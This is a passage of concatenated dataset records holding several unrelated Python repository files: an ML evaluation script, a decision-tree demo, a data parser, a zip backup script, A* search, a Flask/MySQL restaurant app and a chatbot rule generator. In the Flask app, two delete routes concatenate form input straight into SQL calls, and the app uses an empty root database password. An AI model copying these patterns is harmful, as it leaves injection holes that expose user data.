model.named_parameters():\n if 'LinearRegression' in name: # Only print encoder parameters\n print(name, T.diagonal(param.data))\n\n # --------------------------------------EVALUATION OF TRAINING SET--------------------------------------------\n model.eval()\n train_predictions = model(train_dataset[:][0]).detach().numpy()\n y_train = train_dataset[:][1].numpy()\n\n # Set matplotlib fig. size, etc...\n myplot.configure()\n\n # Plot loss curves\n myplot.plot_loss_curves()\n\n # Plot densities of training set\n for idx in range(len(train_predictions[0])):\n filename = 'Images\\\\Full_ROM_model\\\\training' + species[idx]+'.png'\n plt.clf()\n a = y_train[:,idx] # target\n b = train_predictions[:,idx] # predicted\n myplot.plot_predict_target(b, a, sort_by_target=True)\n plt.title(species[idx])\n plt.savefig(filename)\n\n\n#---------------------------------------------EVALUATION OF TEST SET------------------------------------------------------\n\n test_file = 'data\\\\datapointsk1k2k3.txt'\n all_xy = np.loadtxt(test_file,\n usecols=[0,1,2,3,4,5,6,7,8,9,10,11], delimiter=\" \",\n # usecols=range(0,9), delimiter=\"\\t\",\n comments=\"#\", skiprows=0, dtype=np.float64)\n\n tmp_x = all_xy[:,[9,10,11]] # Change this manually\n tmp_y = all_xy[:,k_columns] \n\n func1 = multipy(tmp_y, col1 = 0, col2 = 1)\n func2 = divide(tmp_y, col1 = 0, col2 = 1)\n func3 = add(tmp_y, col1 = 0, col2 = 1)\n\n stack = np.column_stack((func1,func2, func3, tmp_y))\n tmp_y = stack\n\n # Normalize data\n tmp_x = full_dataset.scaler_max_abs.transform(tmp_x)\n tmp_y = full_dataset.scaler.transform(tmp_y)\n\n x_data = T.tensor(tmp_y, \\\n dtype=T.float64).to(device)\n y_data = T.tensor(tmp_x, \\\n dtype=T.float64).to(device)\n\n predict = model(x_data).detach().numpy()\n target = y_data.numpy()\n densities = x_data.numpy()\n\n # Create a scatter plot of the two densitie arrays against each other\n for idx in range(len(predict[0])):\n filename = 'Images\\\\Full_ROM_model\\\\correlations_test' + str(idx+1)+'.png'\n plt.clf()\n a = target[:,idx]\n b = predict[:,idx]\n plt.scatter(a, b)\n\n rel_err = np.abs(np.subtract(a,b)/a)\n # print(rel_err)\n # print(\"stats: \",stats.chisquare(f_obs= b, f_exp= a))\n\n textstr = '\\n'.join((\n r'$Mean\\ \\epsilon_{rel}=%.2f$%%' % (rel_err.mean()*100, ),\n r'$Max\\ \\epsilon_{rel}=%.2f$%%' % (max(rel_err)*100, )))\n\n # colour point o max error\n max_index = np.argmax(rel_err)\n plt.scatter(a[max_index],b[max_index] , color=\"gold\", zorder= 2)\n\n # these are matplotlib.patch.Patch properties\n props = dict(boxstyle='round', alpha=0.5) #, facecolor='none', edgecolor='none')\n\n # place a text box in upper left in axes coords\n plt.text(0.70, 0.25, textstr, fontsize=14, transform=plt.gca().transAxes,\n verticalalignment='top', bbox=props)\n \n # Add labels and a title\n plt.xlabel('True densities')\n plt.ylabel('Predicted densities')\n plt.title(species[idx])\n # Add a diagonal line representing perfect agreement\n plt.plot([0, 1], [0, 1], linestyle='--', color='k')\n plt.savefig(filename)\n\n\n","repo_name":"marcelo-rg/KineticLearn","sub_path":"other_scripts/ROM/neural_ROM.py","file_name":"neural_ROM.py","file_ext":"py","file_size_in_byte":14896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11512246381","text":"import numpy as np\nimport operator\nimport pandas as pd\nfrom Nodes import DecisionNode, LeafNode\nfrom DecisionTree import DecisionTree\n\n# df from the paper c4.5\ndf = pd.DataFrame({'Outlook': ['sunny', 'sunny', 
'sunny', 'sunny', 'sunny', None, 'overcast', 'overcast', 'overcast', 'rain', 'rain', 'rain', 'rain', 'rain'],\n#df = pd.DataFrame({'Outlook': ['sunny', 'sunny', 'sunny', 'sunny', 'sunny', 'overcast', 'overcast', 'overcast', 'overcast', 'rain', 'rain', 'rain', 'rain', 'rain'],\n 'Temperature': [75, 80, 85, 72, 69, 72, 83, 64, 81, 71, 65, 75, 68, 70],\n 'Humidity': [70, 90, 85, 95, 70, 90, 78, 65, 75, 80, 70, 80, 80, 96], \n 'Windy': [True, True, False, False, False, True, False, True, False, True, True, False, False, False], \n 'target': [\"Play\", \"Don't Play\", \"Don't Play\", \"Don't Play\", \"Play\", \"Play\", \"Play\", \"Play\", \"Play\", \"Don't Play\", \"Don't Play\", \"Play\", \"Play\", \"Play\"]})\nattributes_map = {'Outlook': 'categorical', 'Temperature': 'continuous', \n 'Humidity': 'continuous', 'Windy': 'boolean', 'target': 'categorical'}\ndt = DecisionTree(attributes_map)\ndt.fit(df)\nrules = dt.extract_rules()\nprint(\"\\nRules extracted\")\nfor rule in rules.keys():\n print(\"{}:\".format(rule))\n print(rules[rule])\npred_df = df.fillna('?').iloc[[1,5]]\npred_df = pred_df.append({'Outlook': 'sunny', 'Temperature': 70, 'Humidity': '?', 'Windy': False, 'target': 'stocazzo'}, ignore_index=True)\npredictions = dt.predict(pred_df.drop(columns=['target']))\nprint(\"\\nPredictions\")\nprint(predictions)\n","repo_name":"piepor/decision-mining","sub_path":"decision-tree-algo.py","file_name":"decision-tree-algo.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74792325602","text":"import numpy as np\nimport scipy\nimport csv\n\nclass PenParser:\n def __init__(self):\n self.UJI_PENCHARS_DATA = \"../data/ujipenchars2.txt\"\n self.PENDIGITS_TRAINING_DATA = \"../data/pendigits.tra\"\n self.PENDIGITS_TESTING_DATA = \"../data/pendigits.tes\"\n \n def parse_pendigits_csv(self, file_name):\n \"\"\"\n Returns data, answers\n data is a numpy 2darray of floats of shape (num_samples, 16)\n answers is a numpy array of ints of shape (num_samples)\n \"\"\"\n reader = csv.reader(open(file_name))\n lines = list()\n for row in reader:\n lines.append(row)\n \n data = np.zeros((len(lines), 16))\n answers = np.zeros(len(lines))\n\n lines = np.random.permutation(lines)\n\n for i in range(len(lines)):\n data[i,] = map(lambda x: float(x)/100.0, lines[i][:-1])\n answers[i] = int(lines[i][-1])\n\n return data, answers\n\n def parse_UJI_penchars(self, file_name):\n \"\"\" To be implemented \"\"\"\n pass\n \n def retrieve_pendigits_data(self, labeled_fraction):\n \"\"\"\n labeled_fraction (float between 0 and 1) is the fraction of labeled\n training data whose label should be kept\n\n Returns\n X_train_labeled - numpy 2darray of shape (num_labeled_samples, 16)\n Y_train_labeled - numpy 1darray of shape (num_labeled_samples)\n X_train_unlabeled - numpy 2darray of shape (num_unlabeled_samples, 16)\n X_test - numpy 2darray of shape (num_test_samples, 16)\n Y_test - numpy 1darray of shape (num_labeled_samples)\n \"\"\"\n \n data_train, answers_train = self.parse_pendigits_csv(self.PENDIGITS_TRAINING_DATA)\n data_test, answers_test = self.parse_pendigits_csv(self.PENDIGITS_TESTING_DATA)\n \n num_train = data_train.shape[0]\n num_labeled = int(num_train * labeled_fraction)\n\n X_train_labeled = data_train[0:num_labeled, ]\n Y_train_labeled = answers_train[0:num_labeled]\n X_train_unlabeled = data_train[num_labeled:num_train, ]\n X_test = data_test\n Y_test = answers_test\n \n return X_train_labeled, 
Y_train_labeled, X_train_unlabeled, X_test, Y_test\n","repo_name":"jbrakensiek/10701-ss-learning","sub_path":"code/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35436589966","text":"import os, zipfile\n\ndef backup(folder):\n number=1\n while True:\n abs_path=os.path.abspath(folder)\n foldername=os.path.basename(abs_path)\n foldername=foldername+\"_\"+str(number)+\".zip\"\n if(not os.path.exists(foldername)):\n break\n number=number+1\n backupzip=zipfile.ZipFile(foldername,'w')\n print(\"Creating \"+foldername)\n #print(abs_path)\n #print(filename)\n for folder,subfolder,file in os.walk(folder):\n print(\"Adding \"+folder)\n backupzip.write(folder)\n for filename in file:\n print(\"Adding \"+filename)\n backupzip.write(os.path.join(folder,filename))\n \n\nbackup('C:\\\\Example')\n","repo_name":"mahananda96/AutomateStuffWithPython","sub_path":"backupzip.py","file_name":"backupzip.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17713449641","text":"# A star search with a consistent heuristic\n# consistent - h(n) <= cost(n,nb) + h(nb) for all neighbors nb of node n\n# Just admissible - never overestimates\n\nfrom collections import defaultdict\nfrom heapq import heappush, heappop\nimport math\n\ndef a_star(\n start, #node\n goal, #fn, node -> bool\n heuristic, #fn, node -> int (consistent heuristic)\n neighbors, #fn, node -> generator\n edgeCost, #fn, node, node -> int\n):\n \n q = []\n heappush(q, (0,start))\n \n closed = set() # NOT seen list\n \n dist = defaultdict(lambda: math.inf) # curr best, g(x)\n dist[start] = 0\n \n parent = {}\n def get_path(n):\n if n==start: return [n]\n return get_path(parent[n]) + [n]\n\n while q:\n _, n = heappop(q)\n d = dist[n]\n \n if n in closed: continue \n closed.add(n) # Don't add to closed below, like for seen list\n \n if goal(n): \n return d, get_path(n)\n \n for nb in neighbors(n):\n dcalc = edgeCost(n, nb) + d\n if dcalc < dist[nb]: \n # Won't happen for visited nodes if heuristic is consistent\n # If heuristic is only admissible, also remove from closed set here \n parent[nb] = n\n dist[nb] = dcalc\n f = dcalc + heuristic(nb)\n heappush(q, (f, nb))\n # Actually need to re-prioritize okay \n\n return None, None\n\n\n# Compare Djikstra\n\ndef djikstra(graph, source, undirected = False):\n\n pq = [(0,source)]\n dist = {source:0}\n seen = set() # also need this; because a node can be added multiple times\n\n while pq:\n dcurr, node = heappop(pq)\n \n if node in seen: continue\n seen.add(node)\n\n for nb, w in graph[node]:\n dcalc = dcurr + w\n if dist.get(nb, math.inf) > dcalc: \n dist[nb] = dcalc\n heappush(pq, (dcalc, nb))\n \n return dist","repo_name":"rajkar86/python_coding_interviews","sub_path":"basics/a_star_search.py","file_name":"a_star_search.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24058312360","text":"import time\n\nfrom libs.common import md5\nfrom classes.models.CommonModel import CommonModel\nfrom classes.Registry import Registry\n\nclass UrlsBaseModel(CommonModel):\n \"\"\" Class for work with urls_base* tables \"\"\"\n _pathCache = {}\n\n def _get_insert_row(self, path, host_id, parent_id):\n \"\"\" Build and return ready row to insert in DB \"\"\"\n return {\n 'host_id': 
host_id,\n 'project_id': Registry().get('pData')['id'],\n 'name': path,\n 'parent_id': parent_id,\n 'when_add': int(time.time()),\n }\n\n def _path_exists(self, host_id, parent_id, name):\n \"\"\" Is current path exists? \"\"\"\n _hash = md5(\"{0}-{1}-{2}\".format(host_id, parent_id, name))\n if _hash not in self._pathCache.keys():\n self._pathCache[_hash] = \\\n self._db.fetch_one(\n 'SELECT id FROM urls_base WHERE host_id = {0} AND parent_id = {1} AND name = {2}'.\n format(int(host_id), int(parent_id), self._db.quote(name))\n )\n return self._pathCache[_hash]\n\n def _add_path_cache(self, host_id, parent_id, name, _id):\n \"\"\" Add branch id to path-cache \"\"\"\n _hash = md5(\"{0}-{1}-{2}\".format(host_id, parent_id, name))\n self._pathCache[_hash] = _id\n\n def add_url(self, host_id, url):\n \"\"\" Add url in database (with break on parts) \"\"\"\n params = url.split('?')[1] if url.count('?') else ''\n url = url.split('?')[0]\n\n parent_id = 0\n\n if url == '/':\n if not self._path_exists(host_id, 0, '/'):\n new_parent_id = self._db.insert(\"urls_base\", self._get_insert_row(url, host_id, 0))\n self._add_path_cache(host_id, 0, '/', new_parent_id)\n else:\n url = url.split('/')\n for url_part in url:\n if url_part == '':\n if parent_id != 0:\n continue\n\n new_parent_id = self._path_exists(host_id, 0, '/')\n if new_parent_id is None:\n new_row = self._get_insert_row('/', host_id, 0)\n try:\n new_parent_id = self._db.insert(\"urls_base\", new_row)\n self._add_path_cache(host_id, 0, '/', new_parent_id)\n except BaseException:\n pass\n\n parent_id = new_parent_id\n else:\n new_parent_id = self._path_exists(host_id, parent_id, url_part)\n if new_parent_id is None:\n new_row = self._get_insert_row(url_part, host_id, parent_id)\n new_parent_id = self._db.insert(\"urls_base\", new_row)\n self._add_path_cache(host_id, parent_id, url_part, new_parent_id)\n\n parent_id = new_parent_id\n\n if len(params):\n for param in params.split('&'):\n self._db.insert('urls_base_params', {'parent_id': parent_id, 'name': param.split(\"=\")[0]}, True)\n\n","repo_name":"hack4sec/ws-cli","sub_path":"classes/models/UrlsBaseModel.py","file_name":"UrlsBaseModel.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"36488958250","text":"\nfrom flask import Flask\nfrom flask import Flask, render_template, request, redirect, json\nfrom flaskext.mysql import MySQL\n\napp = Flask(__name__)\nmysql = MySQL()\n\n# MySQL configurations\napp.config['MYSQL_DATABASE_USER'] = 'root'\napp.config['MYSQL_DATABASE_PASSWORD'] = ''\napp.config['MYSQL_DATABASE_DB'] = 'MyRestaurant'\napp.config['MYSQL_DATABASE_HOST'] = '127.0.0.1'\nmysql.init_app(app)\n\nconn = mysql.connect()\ncursor = conn.cursor() #kursor MySQL\n\n\n# określenie katalogu głównego\n@app.route(\"/\") \ndef main():\n return render_template('index.html')\n\n\n\n# określenie jak ma sie otworzyć strona MakeNewOrder\n@app.route('/MakeNewOrder')\ndef MakeNewOrder():\n cursor.execute(\"SELECT * FROM pending_orders\")\n data = cursor.fetchall()\n return render_template('MakeNewOrder.html',data2 = data)\n\n# określenie zachowania przycisku\n@app.route('/MakeNewOrderInput',methods= ['GET','POST'])\ndef MakeNewOrderInput():\n\n cursor.execute(\"SELECT * FROM pending_orders\")\n data2 = cursor.fetchall()\n if request.method == \"POST\":\n\n req = request.form #zmienna zapytująca o dane z fromularza\n orderId = req.get(\"MakeNewOrder_orderId\") # wyciągnięcie szukanych danych z 
formularz\n dishId = req.get(\"MakeNewOrder_dishId\")\n cusId = req.get(\"MakeNewOrder_customerId\")\n\n cursor.callproc('make_order',(orderId,dishId,cusId))\n # print(orderId)\n data = cursor.fetchall()\n \n if len(data) is 0:\n conn.commit() \n else:\n return json.dumps({'error':str(data[0])})\n\n return redirect(request.url)\n\n return render_template(\"MakeNewOrder.html\",data2=data2)\n\n\n\n\n\n@app.route('/FinalizeOrder')\ndef FinalizeOrder():\n cursor.execute(\"SELECT * FROM pending_orders\")\n data = cursor.fetchall()\n return render_template('FinalizeOrder.html',data2=data)\n\n@app.route('/FinalizeOrderInput',methods= ['GET','POST'])\ndef FinalizeOrderInput():\n cursor.execute(\"SELECT * FROM pending_orders\")\n data2 = cursor.fetchall()\n if request.method == \"POST\":\n\n req = request.form #zmienna zapytująca o dane z fromularza\n orderId = req.get(\"FinalizeOrderInput_orderId\") # wyciągnięcie szukanych danych z formularz\n empId = req.get(\"FinalizeOrderInput_empId\")\n \n cursor.callproc('finalize_order',(orderId,empId))\n # print(orderId)\n data = cursor.fetchall()\n \n if len(data) is 0:\n conn.commit() \n else:\n return json.dumps({'error':str(data[0])})\n\n return redirect(request.url)\n\n return render_template(\"FinalizeOrder.html\",data2=data2)\n\n\n\n@app.route('/MakeSupplyOrder')\ndef MakeSupplyOrder():\n cursor.execute(\"SELECT * FROM supply_orders\")\n data = cursor.fetchall()\n return render_template('MakeSupplyOrder.html',data2=data)\n\n@app.route('/MakeSupplyOrderInput',methods= ['GET','POST'])\ndef MakeSupplyOrderInput():\n cursor.execute(\"SELECT * FROM supply_orders\")\n data = cursor.fetchall()\n if request.method == \"POST\":\n\n req = request.form #zmienna zapytująca o dane z fromularza\n ShopId = req.get(\"Shop_Id\") # wyciągnięcie szukanych danych z formularz\n EmpId = req.get(\"Emp_id\")\n SupVal = req.get(\"Sup_val\")\n\n cursor.callproc('make_supply_order',(ShopId,EmpId,SupVal))\n # print(orderId)\n data = cursor.fetchall()\n \n if len(data) is 0:\n conn.commit() \n else:\n return json.dumps({'error':str(data[0])})\n\n return redirect(request.url)\n return render_template('MakeSupplyOrder.html',data2 = data)\n\n\n@app.route(\"/ManageMenu\")\ndef ManageMenu():\n cursor.execute(\"SELECT * FROM menu\")\n data = cursor.fetchall()\n return render_template(\"ManageMenu.html\",data2=data)\n\n@app.route(\"/UpdateMenuInput\",methods= ['GET','POST'])\ndef UpdateMenuInput():\n cursor.execute(\"SELECT * FROM menu\")\n data = cursor.fetchall()\n if request.method == \"POST\":\n\n req = request.form #zmienna zapytująca o dane z fromularza\n id = req.get(\"ManageMenu_dishId\") # wyciągnięcie szukanych danych z formularz\n dish = req.get(\"ManageMenu_dish\")\n price = req.get(\"ManageMenu_price\")\n veg = req.get(\"ManageMenu_vegetarian\")\n gluten = req.get(\"ManageMenu_gluten\")\n\n cursor.callproc('update_menu',(id,dish,price,veg,gluten))\n # print(orderId)\n data = cursor.fetchall()\n \n if len(data) is 0:\n conn.commit() \n else:\n return json.dumps({'error':str(data[0])})\n\n return redirect(request.url)\n return render_template(\"ManageMenu.html\",data2=data)\n\n\n@app.route(\"/AddMenuInput\",methods= ['GET','POST'])\ndef AddMenuInput():\n cursor.execute(\"SELECT * FROM menu\")\n data = cursor.fetchall()\n if request.method == \"POST\":\n\n req = request.form #zmienna zapytująca o dane z fromularza\n # wyciągnięcie szukanych danych z formularz\n dish = req.get(\"ManageMenu_dish\")\n price = req.get(\"ManageMenu_price\")\n veg = 
req.get(\"ManageMenu_vegetarian\")\n gluten = req.get(\"ManageMenu_gluten\")\n\n cursor.callproc('add_to_menu',(dish,price,veg,gluten))\n # print(orderId)\n data = cursor.fetchall()\n \n if len(data) is 0:\n conn.commit() \n else:\n return json.dumps({'error':str(data[0])})\n\n return redirect(request.url)\n return render_template(\"ManageMenu.html\",data2=data)\n\n\n@app.route(\"/ManageOrders\")\ndef ManageOrders():\n cursor.execute(\"SELECT * FROM pending_orders\")\n data = cursor.fetchall()\n cursor.execute(\"SELECT * FROM completed_orders\")\n dataC = cursor.fetchall()\n return render_template(\"ManageOrders.html\",data2=data,data3=dataC)\n\n@app.route(\"/DeletePending\",methods= ['GET','POST', 'DELETE'])\ndef DeletePending():\n cursor.execute(\"SELECT * FROM pending_orders\")\n data = cursor.fetchall()\n cursor.execute(\"SELECT * FROM completed_orders\")\n dataC = cursor.fetchall()\n if request.method == \"POST\":\n\n req = request.form #zmienna zapytująca o dane z fromularza\n # wyciągnięcie szukanych danych z formularz\n Id = req.get(\"ManageMenu_dishId\")\n print(type(Id))\n print(Id)\n # cursor.callproc('delete_pending',Id)\n cursor.execute(\"call delete_pending(\"+Id+\")\")\n # print(orderId)\n data = cursor.fetchall()\n \n if len(data) is 0:\n conn.commit() \n else:\n return json.dumps({'error':str(data[0])})\n\n return redirect(request.url)\n return render_template(\"ManageOrders.html\",data2=data, data3=dataC)\n\n@app.route(\"/DeleteFinalized\",methods= ['GET','POST', 'DELETE'])\ndef DeleteFinalized():\n cursor.execute(\"SELECT * FROM pending_orders\")\n dataP = cursor.fetchall()\n cursor.execute(\"SELECT * FROM completed_orders\")\n dataC = cursor.fetchall()\n if request.method == \"POST\":\n\n req = request.form #zmienna zapytująca o dane z fromularza\n # wyciągnięcie szukanych danych z formularz\n Id = req.get(\"ManageMenu_dishId\")\n\n #cursor.callproc('delete_finalized',Id)\n cursor.execute(\"call delete_finalized(\"+Id+\")\")\n # print(orderId)\n data = cursor.fetchall()\n \n if len(data) is 0:\n conn.commit() \n else:\n return json.dumps({'error':str(data[0])})\n\n return redirect(request.url)\n return render_template(\"ManageOrders.html\",data2=dataP, data3=dataC)\n\n\n\n\n@app.route(\"/ViewVegetarian\") \ndef ViewVegetarian():\n cursor.execute(\"SELECT * FROM vegetarian_menu\")\n data = cursor.fetchall()\n return render_template('ViewVegetarian.html',data2=data)\n\n\n@app.route(\"/ViewGlutenFree\") \ndef ViewGlutenFree():\n cursor.execute(\"SELECT * FROM vegetarian_menu\")\n data = cursor.fetchall()\n return render_template('ViewGlutenFree.html',data2=data)\n\n@app.route(\"/ViewEmployees\")\ndef ViewEmployees():\n cursor.execute(\"SELECT * FROM employees\")\n data = cursor.fetchall()\n return render_template('ViewEmployees.html',data2=data)\n\n\n@app.route(\"/ViewMenu\")\ndef ViewMenu():\n cursor.execute(\"SELECT * FROM menu\")\n data = cursor.fetchall()\n return render_template('ViewMenu.html',data2=data)\n\n@app.route(\"/ViewCustomers\")\ndef ViewCustomers():\n cursor.execute(\"SELECT * FROM customers\")\n data = cursor.fetchall()\n return render_template('ViewCustomers.html',data2=data)\n\n@app.route(\"/ViewMostPopularDish\") \ndef ViewMostPopularDish():\n cursor.execute(\"SELECT * FROM most_popular_dish\")\n data = cursor.fetchall()\n return render_template('ViewMostPopularDish.html',data2=data)\n\n\n@app.route(\"/ViewFinalized\") \ndef ViewFinalized():\n cursor.execute(\"SELECT * FROM completed_orders\")\n data = cursor.fetchall()\n return 
render_template('ViewFinalized.html',data2=data)\n\nif __name__ == \"__main__\":\n app.run()\n\n","repo_name":"mati-kw/Projekt-MySQL","sub_path":"FlaskApp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34329568888","text":"# -*- coding: utf-8 -*-\nimport os\nimport re\n\nimport add_syns\nimport preprocessing\nimport find_keywords\nfrom utils import plural_singular\n\nBOTNAME = 'botin'\npln_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nBOTPATH = os.path.join(pln_dir, 'ChatScript', 'RAWDATA', BOTNAME)\n\n\nclass Rejoinder(object):\n rule_label = None\n pattern = None\n\n def __init__(self, rule_label, pattern=None):\n self.rule_label = rule_label\n self.pattern = pattern\n\n def __str__(self):\n if self.pattern:\n pattern = '[{}]'.format(self.pattern)\n cant_help = ''\n else:\n pattern = '[~yess ~adv_afirmacao]'\n cant_help = (\n '\\n\\ta: ([~noo ~adv_negacao])\\n\\t'\n ' $err = ^save_input_error($quest %topic)\\n\\t'\n ' ^pick(~cant_help), ^pick(~not_ready_yet), mas '\n '^pick(~tranfeer)'\n )\n\n string = (\n '\\ta: ({pattern})\\n\\t'\n ' $res = ^save_input($quest %topic {rule_label})\\n\\t'\n ' ^reuse({rule_label})'\n '{cant_help}'\n ).format(\n pattern=pattern, rule_label=self.rule_label, cant_help=cant_help\n )\n\n return string\n\n\nclass Rule(object):\n label_type = None\n rule_id = None\n title = None\n original_question = None\n nosw_question = None\n ppcd_question = None\n add_syns_question = None\n final_question = None\n answer = None\n ctx_entities = None\n\n label = None\n entities = None\n intentions = None\n intentions_syns_dict = None\n splited_entities = None\n\n def __init__(\n self, rule_id, title, question, answer, ctx_entities,\n embedding_model, syns, label_type='U', add_syns_question=None\n ):\n self.label_type = label_type\n self.rule_id = rule_id\n self.title = title\n self.original_question = question\n self.answer = answer\n self.ctx_entities = ctx_entities\n self.label = label_type + str(rule_id)\n self.splited_entities = list()\n self.syns = syns\n\n if add_syns_question is None:\n self.do_preprocessing()\n self.find_intentions_entities()\n self.add_syns(embedding_model)\n else:\n self.add_syns_question = add_syns_question\n\n self.add_plurals_and_nouns_syns(embedding_model)\n\n def do_preprocessing(self):\n self.ppcd_question = preprocessing.preprocess(\n self.original_question, self.ctx_entities\n )\n\n def find_intentions_entities(self):\n # Remove wildcards from preprocessed question\n self.nosw_question = re.sub(r'\\*~\\d+', '', self.ppcd_question)\n\n self.entities = find_keywords.find_entities(self.nosw_question)\n\n for ent in self.entities:\n self.splited_entities.extend(ent.split())\n self.splited_entities = set(self.splited_entities)\n\n self.intentions = find_keywords.find_intention(\n self.nosw_question, self.entities\n )\n\n def add_syns(self, embedding_model):\n self.intentions_syns_dict = add_syns.get_syns(\n self.intentions, embedding_model\n )\n self.add_syns_question = add_syns.add_intentions_syns(\n self.ppcd_question, self.intentions_syns_dict\n )\n\n def get_syns(self, ent):\n for synset in self.syns:\n if ent in synset:\n return synset\n return [ent]\n\n def add_plurals_and_nouns_syns(self, embedding_model):\n question = self.add_syns_question\n entities = list()\n tg_words = find_keywords.tag_text(self.add_syns_question)\n for word in tg_words.split(' '):\n if (\n not 
word.startswith('*') and\n find_keywords.has_tags(word, ['N', 'NPROP', 'ADJ', 'PCP'])\n ):\n entities.append(word.split('/')[0])\n\n for ent in entities:\n syns = self.get_syns(ent)\n plurals = list()\n for syn in syns:\n syn_plural = plural_singular.get_plurals(syn, embedding_model)\n if syn_plural:\n plurals.append(syn_plural)\n\n plurals_text = ' {}'.format(' '.join(plurals)) if plurals else ''\n question = question.replace(\n ent, '[{}{}]'.format(' '.join(syns), plurals_text)\n )\n\n self.add_syns_question = question\n\n @property\n def nospace_question(self):\n return self.nosw_question.replace(' ', ' ')\n\n @property\n def intentions_syns_list(self):\n intentions = list()\n for _, value in self.intentions_syns_dict.items():\n intentions.extend(value)\n return intentions\n\n @property\n def keywords(self):\n kw = set(\n self.intentions +\n self.intentions_syns_list +\n self.entities\n )\n return list(kw)\n\n def processed_answer(self):\n calls = re.findall(r'(.*?<<.*?)>>', self.answer)\n tam = len(calls)\n # TODO: THROW EXCEPTION IF NUM CALLS > REJOINDERS\n rjds = ['a', 'b', 'c', 'd', 'e']\n spaces = '\\t'\n\n answer = ''\n for i in range(tam):\n call_answer, args = calls[i].split('<<')\n args = args.split(' ')\n spaces = '\\t'*(i+1)\n\n if i>0:\n start_rj = '{rj}: ()\\n{spc}'.format(\n rj=rjds[i-1], spc=spaces\n )\n else:\n start_rj = ''\n\n answer = answer + (\n '{start_rejoinder}{answer}\\n'\n '{spc}{program} {param}\\n'\n ).format(\n botpath=BOTPATH,\n start_rejoinder=start_rj,\n answer=call_answer,\n program=args[0],\n param=args[1],\n spc=spaces\n )\n\n if answer:\n self.answer = answer\n\n review = (\n '\\n{spc}$rule = %rule\\n{spc}^reuse(~review_interacion.REVIEW)'\n ).format(spc=spaces)\n return self.answer + review\n\n def __str__(self):\n text = (\n '{extra_space}u: {label} ({rule}){space}{answer}'\n ).format(\n extra_space='\\n'*2 if self.rule_id == 0 else '',\n label=self.label,\n id=self.rule_id,\n rule=self.add_syns_question,\n space='\\n\\t' if self.label_type != 'S' else ' ',\n answer=self.processed_answer()\n )\n return text\n\n\nclass GenericRule(object):\n group = None\n words = None\n questions = None\n rule_id = None\n label = None\n label_type = None\n rejoinders = None\n original_topic_name = None\n wordembedding = None\n\n def __init__(\n self, rule_id, group, words, original_topic_name,\n label_type='G', wordembedding=None\n ):\n self.rule_id = rule_id\n self.label_type = label_type\n self.label = label_type + str(rule_id)\n self.group = group\n self.questions = [rule.original_question for rule in group]\n self.words = words\n self.original_topic_name = original_topic_name\n self.generate_rejoinders()\n self.wordembedding = wordembedding\n\n def generate_rejoinders(self):\n self.rejoinders = list()\n if len(self.group) > 1:\n all_words = set()\n group_entities = self.words.split()\n for rule in self.group:\n # Remove common questions keywords to improve distinction\n keywords = [\n kw for kw in rule.keywords\n if kw not in group_entities and kw not in all_words\n ]\n all_words.update(keywords)\n keywords = ' '.join(keywords)\n label = '~{}.{}'.format(self.original_topic_name, rule.label)\n rej = Rejoinder(label, keywords)\n self.rejoinders.append(rej)\n # Do remove repeated words in multiple rejoinders\n else:\n keywords = None\n label = '~{}.{}'.format(\n self.original_topic_name, self.group[0].label\n )\n rej = Rejoinder(label, keywords)\n self.rejoinders.append(rej)\n\n def rejoinders_text(self):\n return '\\n'.join([ref.__str__() for ref in 
self.rejoinders])\n\n def __str__(self):\n words_with_plural = list()\n for word in self.words.split(' '):\n plural = plural_singular.get_plurals(\n word, cbow=self.wordembedding\n )\n if plural:\n words_with_plural.append('[{} {}]'.format(word, plural))\n else:\n words_with_plural.append(word)\n\n words_with_plural = ' '.join(words_with_plural)\n\n if len(self.group) > 1:\n\n gen_rule = (\n 'u: {label} (<<{words}>>)\\n\\t'\n '$quest = %originalsentence\\n\\t'\n '^pick(~not_well_understood), %user, '\n 'mas ^pick(~search_options):\\n\\t - {questions}\\n'\n '{group_rejoinders}'\n ).format(\n label=self.label,\n words=words_with_plural,\n questions='\\n\\t - '.join(self.questions) + ' -',\n group_rejoinders=self.rejoinders_text()\n )\n else:\n gen_rule = (\n 'u: {label} (<<{words}>>)\\n\\t'\n '$quest = %originalsentence\\n\\t'\n '^pick(~not_well_understood), %user, '\n '^pick(~you_mean) \"{sugestion}\"?\\n'\n '{group_rejoinders}'\n ).format(\n label=self.label,\n words=words_with_plural,\n sugestion=self.group[0].title,\n group_rejoinders=self.rejoinders_text()\n )\n\n return gen_rule\n\n\nclass Group(object):\n rules = None\n entity = None\n\n def __init__(self, rules, entity):\n self.rules = rules\n self.entity = entity\n\n\nclass Topic(object):\n name = None\n keywords = None\n rules = None\n max_return_code = 100\n beauty_name = None\n wordembedding = None\n\n def __init__(self, name, rules, wordembedding, beauty_name=None):\n self.name = name\n self.rules = rules\n self.keywords = list()\n self.beauty_name = beauty_name\n self.wordembedding = wordembedding\n\n if self.name.endswith('_gen'):\n self.keywords.append('REGRAS_GENERICAS')\n self.random = ''\n else:\n self.random = ''\n for rule in self.rules:\n if rule.entities:\n self.keywords.extend(rule.entities)\n else:\n self.keywords.append(rule.original_question)\n new_keywords = list()\n for ent in self.keywords:\n new_keywords.extend(self.rules[0].get_syns(ent))\n self.keywords = new_keywords\n\n def generate_keywords_plurals(self):\n plurals = list()\n if self.name.endswith('_gen'):\n return plurals\n\n for kw in self.keywords:\n plural = ''\n for subkw in kw.split(' '):\n plural_sub = plural_singular.get_plurals(\n subkw, cbow=self.wordembedding\n )\n if plural_sub:\n plural = plural + ' ' + plural_sub\n plurals.append(plural)\n return plurals\n\n def __str__(self):\n\n rules_text = '\\n'.join([rule.__str__() for rule in 